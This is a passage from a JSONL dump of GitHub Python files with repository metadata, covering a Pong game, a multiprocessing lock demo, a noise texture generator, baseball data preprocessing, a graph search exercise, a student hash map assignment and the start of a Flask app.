self.width = self.w\r\n        self.height = self.h\r\n        \r\n    def set_BeatmapData(self,beatmapData):\r\n        self.beatmap = beatmapData\r\n\r\npy3d_data = Py3d_data()\r\n\r\n\r\n","repo_name":"pbh980915/python_2021_3d_rhythmGame_use_osuData","sub_path":"T3dData.py","file_name":"T3dData.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39231154777","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 17 10:08:58 2022\n\n@author: alumno\n\"\"\"\n\nfrom multiprocessing import Process, Lock\nfrom multiprocessing import Value, Array\n\nN = 4 # total number of processes\n\ndef task(common, tid, critical, lock):\n    a = 0\n    for i in range(100):\n        print(f'{tid}−{i}: Non−critical Section')\n        a += 1\n        print(f'{tid}−{i}: End of non−critical Section')\n        critical[tid] = 1\n        \n        lock.acquire() # our wait\n        \n        try:\n            print(f'{tid}−{i}: Critical section')\n            v = common.value + 1\n            print(f'{tid}−{i}: Inside critical section')\n            common.value = v\n            print(f'{tid}−{i}: End of critical section')\n            critical[tid] = 0\n        finally:\n            lock.release() # our signal\n\n    \n\ndef main():\n    lock = Lock()\n    lp = []\n    common = Value('i', 0)\n    critical = Array('i', [0]*N)\n    for tid in range(N):\n        lp.append(Process(target=task, args=(common, tid, critical, lock)))\n    print (f\"Initial counter value {common.value}\")\n    for p in lp:\n        p.start()\n    for p in lp:\n        p.join()\n    print (f\"Final counter value {common.value}\")\n    print (\"done\")\n\nif __name__ == \"__main__\":\n    
main()\n\n","repo_name":"vGuejes/CritSectionSem","sub_path":"lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39013915762","text":"\"\"\"\nRandom noise pattern through uniform filter.\n\"\"\"\n\nimport numpy as np\nfrom scipy.ndimage import uniform_filter\nfrom PIL import Image\n\n# -----------------------------------------------------------------------------\n# *** Define parameters\n\n# Size of texture [pixels]:\ntplSze = (1920, 1200)\n\n# Size of uniform filter [pixels]:\nvarUniFlt = 6\n\n# Mean pixel intensity [RGB intensity, 0 to 255]:\nvarPix = ((-0.71 + 1.0) * 0.5) * 255.0  # 37\n\n# Standard deviation of pixel intensity before smoothing [RGB intensity, 0 to\n# 255]:\nvarSd = ((-0.5294117647058824 + 1.0) * 0.5) * 255.0  # 60.0\n\n# Output path (mean intensity, standard deviation, and filter size left open):\nstrPthOut = '/home/john/Desktop/random_texture_mne_{}_sd_{}_fltr_{}.png'\n\n# -----------------------------------------------------------------------------\n# *** Create texture\n\n# Create random noise array:\naryRndn = np.random.randn(tplSze[1], tplSze[0])\n\n# Scale variance:\naryRndn = np.multiply(aryRndn, varSd)\n\n# Scale mean pixel intensity:\naryRndn = np.add(aryRndn, varPix)\n\n# Apply filter:\naryRndnS = uniform_filter(aryRndn, size=varUniFlt)\n\n# Avoid out of range values (set to black or white accordingly):\naryLgc = np.less(aryRndnS, 0.0)\naryRndnS[aryLgc] = 0.0\naryLgc = np.greater(aryRndnS, 255.0)\naryRndnS[aryLgc] = 255.0\n\n# Cast to integer:\naryRndnS = np.around(aryRndnS).astype(np.uint8)\n\n# -----------------------------------------------------------------------------\n# *** Save texture\n\n# Create image:\nobjImg = Image.fromarray(aryRndnS, mode='L')\n\n# Save image to disk:\nobjImg.save(strPthOut.format(str(np.around(varPix)).split('.')[0],\n                             str(np.around(varSd)).split('.')[0],\n                             str(varUniFlt)))\n# -----------------------------------------------------------------------------\n","repo_name":"ingo-m/PacMan","sub_path":"stimuli/experiment/miscellanea/random_texture.py","file_name":"random_texture.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26793834870","text":"import pygame\nfrom sys import exit\nimport random\nclass Pong(pygame.sprite.Sprite):\n    def __init__(self, surface, colour, player, dimensions):\n        super().__init__()\n        self.image = surface\n        self.image.fill(colour)\n        self.colour = colour\n        self.player = player\n        self.dimensions = dimensions\n        if self.player == 1:\n            self.rect = self.image.get_rect(midleft=(0,int(dimensions[1]/2)))\n        else:\n            self.rect = self.image.get_rect(midright=(dimensions[0],int(dimensions[1]/2)))\n    def movement(self):\n        keys = pygame.key.get_pressed()\n        if self.player == 1:\n            if keys[pygame.K_w]:\n                self.rect.y -= 10\n            elif keys[pygame.K_s]:\n                self.rect.y += 10\n        else:\n            if keys[pygame.K_UP]:\n                self.rect.y -= 10\n            elif keys[pygame.K_DOWN]:\n                self.rect.y += 10\n    def check_limits(self):\n        if self.rect.bottom >= self.dimensions[1]:\n            self.rect.bottom = self.dimensions[1]\n        elif self.rect.top < 0:\n            self.rect.top = 0\n    def update(self):\n        self.movement()\n        self.check_limits()\n\nclass Ball():\n    def __init__(self, dimensions, r, colour, screen):\n        super().__init__()\n        self.r = r\n        self.colour = colour\n        self.screen = screen\n        self.dimensions = dimensions\n        self.pong_sound = 
pygame.mixer.Sound('Pong/sounds/pong_ricochet.mp3')\n        self.pong_sound.set_volume(0.5)\n        self.wall_sound = pygame.mixer.Sound('Pong/sounds/wall_ricochet.mp3')\n        self.wall_sound.set_volume(0.5)\n        self.goal_sound = pygame.mixer.Sound('Pong/sounds/goal.mp3')\n        self.goal_sound.set_volume(0.5)\n        self.initial_direction()\n    \n    def draw(self):\n        self.rect = pygame.draw.circle(self.screen, self.colour, [self.x, self.y], self.r)\n\n    \n    def movement(self):\n        self.x += round(self.x_multiplier*2*self.x_direction)\n        self.y += round(self.y_multiplier*2*self.y_direction)\n    \n    def initial_direction(self):\n        self.x = self.dimensions[0]//2\n        self.y = self.dimensions[1]//2\n        directions = (1,-1)\n        self.x_multiplier = 1\n        self.y_multiplier = random.randint(0,1)\n        self.x_direction = directions[random.randint(0,1)]\n        self.y_direction = directions[random.randint(0,1)]\n    \n    def reverse(self,object):\n        if object == 'pong':\n            self.x_direction *= -1\n        else:\n            self.y_direction *= -1\n        if self.x_multiplier >= 12:\n            self.x_multiplier = 12  # cap the speed multiplier\n        else:\n            self.x_multiplier += 0.4\n            self.y_multiplier += 0.4\n\n    def score(self, score_dictionary):\n        if self.x > self.dimensions[0]:\n            self.goal_sound.play()\n            score_dictionary['Red'] = score_dictionary.get('Red') + 1\n            self.initial_direction()\n            self.colour = 'White'\n        if self.x < 0:\n            self.goal_sound.play()\n            score_dictionary['Blue'] = score_dictionary.get('Blue') + 1\n            self.initial_direction()\n            self.colour = 'White'\n        return score_dictionary\n\ndef initialise(dimensions):\n    pygame.init()\n    screen_dimensions = dimensions\n    pong_width = 10\n    pong_length = int(screen_dimensions[0]/4)\n    screen = pygame.display.set_mode(screen_dimensions)\n    pygame.display.set_caption('Pong')\n    score_font = pygame.font.Font('Pong/font/ARCADE_N.TTF', 40)\n    clock = pygame.time.Clock()\n    players = pygame.sprite.Group()\n    background = pygame.Surface(screen_dimensions)\n    top_wall = pygame.draw.line(background, 'Black', (0,0), (screen_dimensions[0],0), 1)\n    bottom_wall = pygame.draw.line(background, 'Black', (0,screen_dimensions[1]-1), (screen_dimensions[0],screen_dimensions[1]-1), 1)\n    walls = (top_wall,bottom_wall)\n    pong_red = pygame.Surface([pong_width,pong_length])\n    pong_blue = pygame.Surface([pong_width,pong_length])\n    player1 = Pong(pong_red, 'Red', 1, screen_dimensions)\n    player2 = Pong(pong_blue, 'Blue', 2, screen_dimensions)\n    players.add(player1, player2)\n    ball = Ball(screen_dimensions, 10, 'White', screen)\n    return screen, clock, background, walls, players, ball, score_font\n\ndef checkcollision(walls, players, ball):\n    for player in players.sprites():\n        if player.rect.colliderect(ball.rect):\n            ball.reverse('pong')\n            ball.colour = player.colour\n            ball.pong_sound.play()\n    for wall in walls:\n        if wall.colliderect(ball.rect):\n            ball.reverse('wall')\n            ball.wall_sound.play()\n\ndef display_score(screen, score, score_font, dimensions):\n    score_surf = score_font.render(f\"{score['Red']} - {score['Blue']}\", False,(64,64,64))\n    score_rect = score_surf.get_rect(center = (dimensions[0]//2,50))\n    screen.blit(score_surf, score_rect)\n\ndef check_score(score, game_active):\n    if abs(score['Blue']-score['Red']) > 1 or max(score.values()) == 3:\n        maxkey = max(score, key=score.get)\n        win_msg = f\"{maxkey} wins\"\n        game_active = 2\n        return win_msg, game_active\n    else:\n        return None, game_active\n\ndef display_message(screen, score_font, win_msg, dimensions):\n    message_surf = score_font.render(win_msg, False,(64,64,64))\n    message_rect = message_surf.get_rect(center = (dimensions[0]//2,dimensions[1]//2))\n    
screen.blit(message_surf, message_rect)\n\ndef run():\n screen, clock, background, walls, players, ball, score_font = initialise((800,800))\n score = {'Red':0, 'Blue':0}\n title_font = pygame.font.Font('Pong/font/ARCADE_N.TTF', 40)\n game_active = 0\n while True:\n if game_active == 0:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n exit()\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n game_active = 1\n screen.blit(background,(0,0))\n display_message(screen, title_font, f'Pong', ball.dimensions)\n pygame.display.update()\n clock.tick(10)\n elif game_active==1:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n players.clear(screen,background)\n screen.blit(background,(0,0))\n players.draw(screen)\n ball.draw()\n checkcollision(walls, players, ball)\n ball.movement()\n players.update()\n score = ball.score(score)\n display_score(screen, score, score_font, ball.dimensions)\n win_msg, game_active = check_score(score, game_active)\n pygame.display.update()\n clock.tick(120)\n\n elif game_active == 2:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n exit()\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n run()\n players.clear(screen,background)\n screen.blit(background,(0,0))\n display_message(screen, score_font, win_msg, ball.dimensions)\n pygame.display.update()\n clock.tick(10)\nif __name__ == \"__main__\":\n run() ","repo_name":"Kayse-Johnson/Pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":7767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38844359739","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\n\n\ndef preprocess(raw_file):\n df = pd.read_csv(raw_file)\n df = df.iloc[200:]\n df.loc[df['home_pitcher_prev_ip'] < 0, 'home_pitcher_prev_ip'] = 0\n df.loc[df['home_pitcher_prev_ip'] < 20, 'home_pitcher_prev_era'] = 6.00\n df.loc[df['home_pitcher_curr_ip'] < 20, 'home_pitcher_curr_era'] = df['home_pitcher_prev_era']\n df.loc[df['away_pitcher_prev_ip'] < 0, 'away_pitcher_prev_ip'] = 0\n df.loc[df['away_pitcher_prev_ip'] < 20, 'away_pitcher_prev_era'] = 6.00\n df.loc[df['away_pitcher_curr_ip'] < 20, 'away_pitcher_curr_era'] = df['away_pitcher_prev_era']\n df.insert(loc=11, column='pitcher_adv', value= df['home_pitcher_adv'] + df['away_pitcher_adv'])\n df.drop(columns=['home_pitcher_curr_ip', 'away_pitcher_curr_ip', 'home_pitcher_adv', 'away_pitcher_adv'], inplace=True)\n df.reset_index(drop=True, inplace=True)\n return df\n\n \ndef normalize(df, df_test, columns):\n x = df.values\n x_test = df_test.values\n scaler = preprocessing.MinMaxScaler()\n x_scaled = scaler.fit_transform(x)\n x_scaled_test = scaler.transform(x_test)\n df = pd.DataFrame(x_scaled, columns=columns)\n df_test = pd.DataFrame(x_scaled_test, columns=columns)\n return x_scaled, df, x_scaled_test, df_test\n\n\ndef standardize(df, df_test, columns):\n x = df.values\n x_test = df_test.values\n scaler = preprocessing.StandardScaler()\n x_scaled = scaler.fit_transform(x)\n x_scaled_test = scaler.transform(x_test)\n df = pd.DataFrame(x_scaled, columns=columns)\n df_test = 
pd.DataFrame(x_scaled_test, columns=columns)\n    return x_scaled, df, x_scaled_test, df_test\n\n\ndef principal_component_analysis(x, x_test, column_names, n=None):\n    if n is None:\n        n = min(x.shape[0], x.shape[1])\n    pca = PCA(n_components=n)\n    p_comp = pca.fit_transform(x)\n    p_comp_test = pca.transform(x_test)\n    plt.matshow(pca.components_,cmap='viridis')\n    plt.yticks([0,1,2,3,4,5,6],['1st Comp','2nd Comp','3rd Comp', '4th Comp', '5th Comp', '6th Comp', '7th Comp'],fontsize=10)\n    plt.colorbar()\n    plt.xticks(range(len(column_names)),column_names,rotation=65,ha='left')\n    plt.tight_layout()\n    plt.show()\n    plt.clf()\n    columns = []\n    nums = []\n    for i in range(n):\n        nums.append(i)\n        columns.append('p_c_'+str(i+1))\n    df = pd.DataFrame(data=p_comp, columns=columns)\n    df_test = pd.DataFrame(data=p_comp_test, columns=columns)\n    ev = pca.explained_variance_ratio_\n    plt.plot(ev, marker='o')\n    plt.xticks(nums, labels=list(np.array(nums)+1))\n    plt.show()\n    return df, df_test\n\n\nif __name__ == '__main__':\n    df_17 = preprocess('data/2017-regularLabeledRawNew.csv')\n    df_18 = preprocess('data/2018-regularLabeledRawNew.csv')\n    df = df_17.append(df_18, ignore_index=True)\n    df.to_csv('data/17-18-regularPP.csv')\n    df_test = preprocess('data/2019-regularLabeledRawNew.csv')\n    df_test.to_csv('data/2019-regularPP.csv')\n    to_process = df.drop(columns = ['date', 'home_team', 'away_team', 'fir_result'])\n    to_process_test = df_test.drop(columns = ['date', 'home_team', 'away_team', 'fir_result'])\n    x_norm, df_norm, x_norm_test, df_norm_test = normalize(to_process, to_process_test, to_process.columns.values)\n    df_norm_cent = df_norm - df_norm.mean()\n    df_norm_cent_test = df_norm_test - df_norm.mean()\n    df_norm_cent['label'] = df['fir_result']\n    df_norm_cent_test['label'] = df_test['fir_result']\n    df_norm_cent.to_csv('data/17-18-norm-centered.csv')\n    df_norm_cent_test.to_csv('data/2019-norm-centered.csv')\n    x_std, df_std, x_std_test, df_std_test = standardize(to_process, to_process_test, to_process.columns.values)\n    df2 = df.copy()\n    df_std['label'] = df['fir_result']\n    df_std_test['label'] = df_test['fir_result']\n    df_std.to_csv('data/17-18-standardized.csv')\n    df_std_test.to_csv('data/2019-standardized.csv')\n    df_pc, df_pc_test = principal_component_analysis(x=x_norm, x_test=x_norm_test, column_names=to_process.columns)\n    df_pc['label'] = df['fir_result']\n    df_pc_test['label'] = df_test['fir_result']\n    df_pc.to_csv('data/17-18-pca-norm.csv')\n    df_pc_test.to_csv('data/2019-pca-norm.csv')\n","repo_name":"gmjohns/bookie","sub_path":"src/msfapi/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"13003103328","text":"import sys\nsys.stdin = open(\"[TST]바이러스_input.txt\", \"r\")\n\ndef DFS(no):\n    # From the current computer, follow unvisited connected computers, marking them visited and counting\n    global count\n    if visited[no] == 0:\n        visited[no] = 1\n        count += 1\n        for i in range(1, N + 1):\n            if data[no][i] == 1:\n                DFS(i)\n\n\nN = int(input())\nM = int(input())\ndata = [[0] * (N + 1) for _ in range(N + 1)]  # adjacency matrix\nvisited = [0] * (N + 1)  # visited flags\nfor i in range(M):\n    s, e = map(int, input().split())\n    data[s][e] = data[e][s] = 1  # mark the connection\ncount = 0\nDFS(1)  # start from computer 1\nprint(count - 1)\n\n###################################################################################\n\n# Teacher's solution\ndef FF(n):\n    # From the current computer, follow unvisited connected computers, marking them visited and counting\n    global sol\n    chk[n] = 1\n    sol += 1\n    for i in range(1, N+1): # connected computers (columns)\n        if arr[n][i] and chk[i] == 
0:\n            FF(i)\n\nN = int(input())\nM = int(input())\nchk = [0]*(N+1) # visited flags\narr = [[0]*(N+1) for _ in range(N+1)] # adjacency matrix\nfor i in range(M):\n    s, e = map(int, input().split())\n    arr[s][e] = arr[e][s] = 1 # mark the connection\n\nsol = 0\nFF(1) # start from computer 1\nprint(sol-1)","repo_name":"hongyong3/TIL","sub_path":"Algorithm/문제/수업/D-13t/AD/[TST]바이러스.py","file_name":"[TST]바이러스.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4653932505","text":"# Course: CS261 - Data Structures\n# Assignment: 5.1 hash_map\n# Student: Jeff Stone - 934256195\n# Description: This program implements the HashMap class by implementing the\n#              following methods:\n#              put()\n#              get()\n#              remove()\n#              contains_key()\n#              clear()\n#              empty_buckets()\n#              resize_table()\n#              table_load()\n#              get_keys()\n\n\n# Import pre-written DynamicArray and LinkedList classes\nfrom a5_include import *\n\n\ndef hash_function_1(key: str) -> int:\n    \"\"\"\n    Sample Hash function #1 to be used with A5 HashMap implementation\n    DO NOT CHANGE THIS FUNCTION IN ANY WAY\n    \"\"\"\n    hash = 0\n    for letter in key:\n        hash += ord(letter)\n    return hash\n\n\ndef hash_function_2(key: str) -> int:\n    \"\"\"\n    Sample Hash function #2 to be used with A5 HashMap implementation\n    DO NOT CHANGE THIS FUNCTION IN ANY WAY\n    \"\"\"\n    hash, index = 0, 0\n    index = 0\n    for letter in key:\n        hash += (index + 1) * ord(letter)\n        index += 1\n    return hash\n\n\nclass HashMap:\n    def __init__(self, capacity: int, function) -> None:\n        \"\"\"\n        Init new HashMap based on DA with SLL for collision resolution\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        self.buckets = DynamicArray()\n        for _ in range(capacity):\n            self.buckets.append(LinkedList())\n        self.capacity = capacity\n        self.hash_function = function\n        self.size = 0\n\n    def __str__(self) -> str:\n        \"\"\"\n        Return content of hash map t in human-readable form\n        DO NOT CHANGE THIS METHOD IN ANY WAY\n        \"\"\"\n        out = ''\n        for i in range(self.buckets.length()):\n            list = self.buckets.get_at_index(i)\n            out += str(i) + ': ' + str(list) + '\\n'\n        return out\n\n\n    def clear(self) -> None:\n        \"\"\"\n        This method clears the content of the hash map without changing the underlying\n        hash table capacity.\n        \"\"\"\n        for index in range(self.capacity):\n            for node in self.buckets.get_at_index(index):\n                self.buckets.get_at_index(index).remove(node.key)\n                self.size -= 1\n\n        return\n\n\n    def get(self, key: str) -> object:\n        \"\"\"\n        This method returns the value associated with the given key.\n        If the key is not in the hash map, the method returns None.\n        :param key: the key to get\n        :return: the value object associated with the key or None if empty\n        \"\"\"\n        hash = self.hash_function(key)\n        index = hash % self.capacity\n        list = self.buckets.get_at_index(index)\n\n        if list.contains(key):\n            for node in list:\n                if node.key == key:\n                    return node.value\n\n        return None\n\n\n    def put(self, key: str, value: object) -> None:\n        \"\"\"\n        This method updates the key:value pair in the hash map.\n        If a given key already exists in the hash map, its associated\n        value is replaced with the new value.\n        If a given key is not in the hash map, a key:value pair is added.\n        :param key: the key where the value is to be inserted\n        :param value: the value to be inserted\n        \"\"\"\n        hash = self.hash_function(key)\n        index = hash % self.capacity\n\n        if self.contains_key(key):\n            for node in self.buckets.get_at_index(index):\n                if node.key == key:\n                    node.value = 
value\n        else:\n            self.buckets.get_at_index(index).insert(key, value)\n            self.size += 1\n\n\n    def remove(self, key: str) -> None:\n        \"\"\"\n        This method removes the given key and its associated value from the hash map.\n        If a given key is not in the hash map, the method does nothing.\n        :param key: key to be removed from hash map\n        \"\"\"\n        hash = self.hash_function(key)\n        index = hash % self.capacity\n\n        # if hash map contains the key find node and remove it\n        if self.contains_key(key):\n            for node in self.buckets.get_at_index(index):\n                if node.key == key:\n                    self.buckets.get_at_index(index).remove(node.key)\n\n            self.size -= 1\n\n        return\n\n\n    def contains_key(self, key: str) -> bool:\n        \"\"\"\n        This method returns True if the given key is in the hash map, otherwise it returns False.\n        An empty hash map does not contain any keys.\n        :param key: key to find\n        :return: returns True if the key is in the hash map, otherwise returns False\n        \"\"\"\n        hash = self.hash_function(key)\n        index = hash % self.capacity\n        list = self.buckets.get_at_index(index) #get a singly linked list\n\n        if list.contains(key) is not None:\n            return True\n\n        return False\n\n    def empty_buckets(self) -> int:\n        \"\"\"\n        This method determines the number of empty buckets in the hash map.\n        :return int: returns the number of empty buckets in the hash map\n        \"\"\"\n        empty = 0\n\n        for index in range(self.capacity):\n            if self.buckets.get_at_index(index).length() == 0:\n                empty += 1\n\n        return empty\n\n    def table_load(self) -> float:\n        \"\"\"\n        This method returns the current hash table load factor\n        (determines the overall hash map usage)\n        :return float: overall hash map usage\n        \"\"\"\n        hash_use = 0\n\n        for index in range(self.capacity):\n            list = self.buckets.get_at_index(index)\n\n            hash_use += list.length()\n\n        return hash_use / self.capacity\n\n    def resize_table(self, new_capacity: int) -> None:\n        \"\"\"\n        This method changes the capacity of the internal hash table.\n        All existing key:value pairs remain in the new hash map\n        and all hash table links are rehashed.\n        If new_capacity is less than 1, the method does nothing.\n        :param new_capacity: new capacity of the internal hash table\n        \"\"\"\n        if new_capacity < 1:\n\n            return\n\n        new_hashmap = DynamicArray()\n\n        # generate the new hash map\n        for i in range(new_capacity):\n            new_hashmap.append(LinkedList())\n\n        for index in range(self.capacity):\n            list = self.buckets.get_at_index(index)    # get the singly linked list\n\n            if list.length() == 0:\n                continue\n\n            for node in list:\n                # generate new hash\n                hash = self.hash_function(node.key)\n                index = hash % new_capacity\n                #insert in new hash map\n                new_hashmap.get_at_index(index).insert(node.key, node.value)\n\n        # replace old values with new\n        self.buckets = new_hashmap\n        self.capacity = new_capacity\n\n        del new_hashmap\n\n        return\n\n    def get_keys(self) -> DynamicArray:\n        \"\"\"\n        This method returns a DynamicArray that contains all keys stored in your hash map.\n        The order of the keys in the DA does not matter.\n        :return DynamicArray: returns an array of keys in the hash map\n        \"\"\"\n        DA = DynamicArray()\n        for index in range(self.capacity):\n            list = self.buckets.get_at_index(index)\n\n            if list.length() == 0:\n                continue\n\n            for node in list:\n                DA.append(node.key)\n\n        return DA\n\n\n# BASIC TESTING\nif __name__ == \"__main__\":\n\n    print(\"\\nPDF - empty_buckets example 1\")\n    print(\"-----------------------------\")\n    m = HashMap(100, hash_function_1)\n    print(m.empty_buckets(), m.size, m.capacity)\n    m.put('key1', 10)\n    
print(m.empty_buckets(), m.size, m.capacity)\n m.put('key2', 20)\n print(m.empty_buckets(), m.size, m.capacity)\n m.put('key1', 30)\n print(m.empty_buckets(), m.size, m.capacity)\n m.put('key4', 40)\n print(m.empty_buckets(), m.size, m.capacity)\n\n\n print(\"\\nPDF - empty_buckets example 2\")\n print(\"-----------------------------\")\n m = HashMap(50, hash_function_1)\n for i in range(150):\n m.put('key' + str(i), i * 100)\n if i % 30 == 0:\n print(m.empty_buckets(), m.size, m.capacity)\n\n\n print(\"\\nPDF - table_load example 1\")\n print(\"--------------------------\")\n m = HashMap(100, hash_function_1)\n print(m.table_load())\n m.put('key1', 10)\n print(m.table_load())\n m.put('key2', 20)\n print(m.table_load())\n m.put('key1', 30)\n print(m.table_load())\n\n\n print(\"\\nPDF - table_load example 2\")\n print(\"--------------------------\")\n m = HashMap(50, hash_function_1)\n for i in range(50):\n m.put('key' + str(i), i * 100)\n if i % 10 == 0:\n print(m.table_load(), m.size, m.capacity)\n\n print(\"\\nPDF - clear example 1\")\n print(\"---------------------\")\n m = HashMap(100, hash_function_1)\n print(m.size, m.capacity)\n m.put('key1', 10)\n m.put('key2', 20)\n m.put('key1', 30)\n print(m.size, m.capacity)\n m.clear()\n print(m.size, m.capacity)\n\n\n print(\"\\nPDF - clear example 2\")\n print(\"---------------------\")\n m = HashMap(50, hash_function_1)\n print(m.size, m.capacity)\n m.put('key1', 10)\n print(m.size, m.capacity)\n m.put('key2', 20)\n print(m.size, m.capacity)\n m.resize_table(100)\n print(m.size, m.capacity)\n m.clear()\n print(m.size, m.capacity)\n\n\n print(\"\\nPDF - put example 1\")\n print(\"-------------------\")\n m = HashMap(50, hash_function_1)\n for i in range(150):\n m.put('str' + str(i), i * 100)\n if i % 25 == 24:\n print(m.empty_buckets(), m.table_load(), m.size, m.capacity)\n\n\n print(\"\\nPDF - put example 2\")\n print(\"-------------------\")\n m = HashMap(40, hash_function_2)\n for i in range(50):\n m.put('str' + str(i // 3), i * 100)\n if i % 10 == 9:\n print(m.empty_buckets(), m.table_load(), m.size, m.capacity)\n\n\n print(\"\\nPDF - contains_key example 1\")\n print(\"----------------------------\")\n m = HashMap(10, hash_function_1)\n print(m.contains_key('key1'))\n m.put('key1', 10)\n m.put('key2', 20)\n m.put('key3', 30)\n print(m.contains_key('key1'))\n print(m.contains_key('key4'))\n print(m.contains_key('key2'))\n print(m.contains_key('key3'))\n m.remove('key3')\n print(m.contains_key('key3'))\n\n\n print(\"\\nPDF - contains_key example 2\")\n print(\"----------------------------\")\n m = HashMap(75, hash_function_2)\n keys = [i for i in range(1, 1000, 20)]\n for key in keys:\n m.put(str(key), key * 42)\n print(m.size, m.capacity)\n result = True\n for key in keys:\n # all inserted keys must be present\n result &= m.contains_key(str(key))\n # NOT inserted keys must be absent\n result &= not m.contains_key(str(key + 1))\n print(result)\n\n\n print(\"\\nPDF - get example 1\")\n print(\"-------------------\")\n m = HashMap(30, hash_function_1)\n print(m.get('key'))\n m.put('key1', 10)\n print(m.get('key1'))\n\n\n print(\"\\nPDF - get example 2\")\n print(\"-------------------\")\n m = HashMap(150, hash_function_2)\n for i in range(200, 300, 7):\n m.put(str(i), i * 10)\n print(m.size, m.capacity)\n for i in range(200, 300, 21):\n print(i, m.get(str(i)), m.get(str(i)) == i * 10)\n print(i + 1, m.get(str(i + 1)), m.get(str(i + 1)) == (i + 1) * 10)\n\n\n print(\"\\nPDF - remove example 1\")\n print(\"----------------------\")\n m = 
HashMap(50, hash_function_1)\n print(m.get('key1'))\n m.put('key1', 10)\n print(m.get('key1'))\n m.remove('key1')\n print(m.get('key1'))\n m.remove('key4')\n\n\n print(\"\\nPDF - resize example 1\")\n print(\"----------------------\")\n m = HashMap(20, hash_function_1)\n m.put('key1', 10)\n print(m.size, m.capacity, m.get('key1'), m.contains_key('key1'))\n m.resize_table(30)\n print(m.size, m.capacity, m.get('key1'), m.contains_key('key1'))\n\n\n print(\"\\nPDF - resize example 2\")\n print(\"----------------------\")\n m = HashMap(75, hash_function_2)\n keys = [i for i in range(1, 1000, 13)]\n for key in keys:\n m.put(str(key), key * 42)\n print(m.size, m.capacity)\n\n for capacity in range(111, 1000, 117):\n m.resize_table(capacity)\n\n m.put('some key', 'some value')\n result = m.contains_key('some key')\n m.remove('some key')\n\n for key in keys:\n result &= m.contains_key(str(key))\n result &= not m.contains_key(str(key + 1))\n print(capacity, result, m.size, m.capacity, round(m.table_load(), 2))\n\n\n print(\"\\nPDF - get_keys example 1\")\n print(\"------------------------\")\n m = HashMap(10, hash_function_2)\n for i in range(100, 200, 10):\n m.put(str(i), str(i * 10))\n print(m.get_keys())\n\n m.resize_table(1)\n print(m.get_keys())\n\n m.put('200', '2000')\n m.remove('100')\n m.resize_table(2)\n print(m.get_keys())\n","repo_name":"jeffreykstone/CS261_assignment5_hash_map","sub_path":"hash_map.py","file_name":"hash_map.py","file_ext":"py","file_size_in_byte":12827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8690167295","text":"# cook your dish here\nt=int(input())\nfor _ in range(t):\n n=int(input())\n arr=list(map(int,input().lstrip().split()))\n arr.sort()\n count = 0\n rep=1\n for i in range(n-1):\n if arr[i]*arr[i+1]>arr[i]+arr[i+1]:\n count+=(n-(i+1))*rep\n rep=1\n if arr[i]==arr[i+1] and arr[i]==2:\n rep+=1\n print(count)","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"PROSUM.py","file_name":"PROSUM.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"3319566011","text":"import os\nimport sys\nimport requests\nfrom flask import Flask, render_template, redirect, make_response, request, session, abort\nfrom data import db_session\nfrom data.users import User\nfrom data.goods import Goods\nfrom forms.goods import GoodsForm\nfrom forms.users import RegisterForm, LoginForm, EditForm\nfrom flask_login import LoginManager, login_user, logout_user, login_required, current_user\nfrom werkzeug.utils import secure_filename\nfrom flask_socketio import SocketIO, send\n\napp = Flask(__name__)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\nUPLOAD_PATH = 'static/images/'\n\n\ndef get_map_picture():\n map_request = \"https://static-maps.yandex.ru/1.x/?ll=37.596056,55.635236&z=15&l=map&pt=37.596056,55.635236,pm2rdm\"\n response = requests.get(map_request)\n if not response:\n print(\"Ошибка выполнения запроса:\")\n print(map_request)\n print(\"Http статус:\", response.status_code, \"(\", response.reason, \")\")\n sys.exit(1)\n map_file = \"static/img/map.png\"\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n db_sess = db_session.create_session()\n return db_sess.query(User).get(user_id)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n db_sess = 
